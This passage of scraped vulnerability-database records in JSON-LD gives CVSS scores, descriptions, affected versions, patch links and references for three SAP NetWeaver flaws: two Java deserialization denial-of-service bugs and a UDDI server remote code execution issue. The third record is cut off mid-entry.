"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-1239",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7400.12.21.30308"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7400.12.21.30308:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9844"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ERPScan",
"sources": [
{
"db": "BID",
"id": "96865"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9844",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-9844",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-9844",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-9844",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-533",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-9844",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804. SAP NetWeaver is prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to cause a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "BID",
"id": "96865"
},
{
"db": "VULMON",
"id": "CVE-2017-9844"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9844",
"trust": 2.8
},
{
"db": "BID",
"id": "96865",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-9844",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"db": "BID",
"id": "96865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"id": "VAR-201707-1239",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:02:59.684000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "March 2017 (2399804)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/"
},
{
"title": "SAP NetWeaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=71679"
},
{
"title": "SAP_vulnerabilities",
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities "
},
{
"title": "Java-Deserialization-Cheat-Sheet",
"trust": 0.1,
"url": "https://github.com/klausware/java-deserialization-cheat-sheet "
},
{
"title": "Java-Deserialization-Cheat-Sheet",
"trust": 0.1,
"url": "https://github.com/grrrdog/java-deserialization-cheat-sheet "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-502",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://erpscan.com/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/96865"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9844"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9844"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2399804"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"db": "BID",
"id": "96865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"db": "BID",
"id": "96865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-12T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96865"
},
{
"date": "2017-08-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"date": "2017-07-12T16:29:00.420000",
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"date": "2017-07-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9844"
},
{
"date": "2017-07-19T13:07:00",
"db": "BID",
"id": "96865"
},
{
"date": "2017-08-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005884"
},
{
"date": "2018-12-10T19:29:24.987000",
"db": "NVD",
"id": "CVE-2017-9844"
},
{
"date": "2017-07-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005884"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-533"
}
],
"trust": 0.6
}
}
var-201704-0088
Vulnerability from variot
The SAP EP-RUNTIME component in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to cause a denial of service (out-of-memory error and service instability) via a crafted serialized Java object, as demonstrated by serial.cc3, aka SAP Security Note 2315788. SAP NetWeaver is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0088",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "as java 7.5"
}
],
"sources": [
{
"db": "BID",
"id": "91733"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-10304"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu Geli (ERPScan)",
"sources": [
{
"db": "BID",
"id": "91733"
}
],
"trust": 0.3
},
"cve": "CVE-2016-10304",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-10304",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-10304",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-10304",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-1306",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The SAP EP-RUNTIME component in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to cause a denial of service (out-of-memory error and service instability) via a crafted serialized Java object, as demonstrated by serial.cc3, aka SAP Security Note 2315788. SAP NetWeaver is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "BID",
"id": "91733"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-10304",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306",
"trust": 0.6
},
{
"db": "BID",
"id": "91733",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "91733"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"id": "VAR-201704-0088",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:44:09.047000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
},
{
"title": "SAP NetWeaver Application Server Java Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=148141"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-502",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-16-029-sap-netweaver-java-7-5-deserialization-untrusted-user-value-trustmanagementservlet/"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-16-029-sap-netweaver-java-7-5-deserialization-untrusted-user-value-trustmanagementservlet/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10304"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10304"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2315788"
},
{
"trust": 0.3,
"url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-july-2016/"
}
],
"sources": [
{
"db": "BID",
"id": "91733"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "91733"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-12T00:00:00",
"db": "BID",
"id": "91733"
},
{
"date": "2017-05-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"date": "2017-04-10T14:59:00.187000",
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"date": "2017-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:04:00",
"db": "BID",
"id": "91733"
},
{
"date": "2017-05-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008306"
},
{
"date": "2021-04-20T19:10:12.500000",
"db": "NVD",
"id": "CVE-2016-10304"
},
{
"date": "2021-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA of SAP EP-RUNTIME Service disruption in components (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008306"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1306"
}
],
"trust": 0.6
}
}
var-201908-1845
Vulnerability from variot
A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate. SAP NetWeaver UDDI server (Services Registry) Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
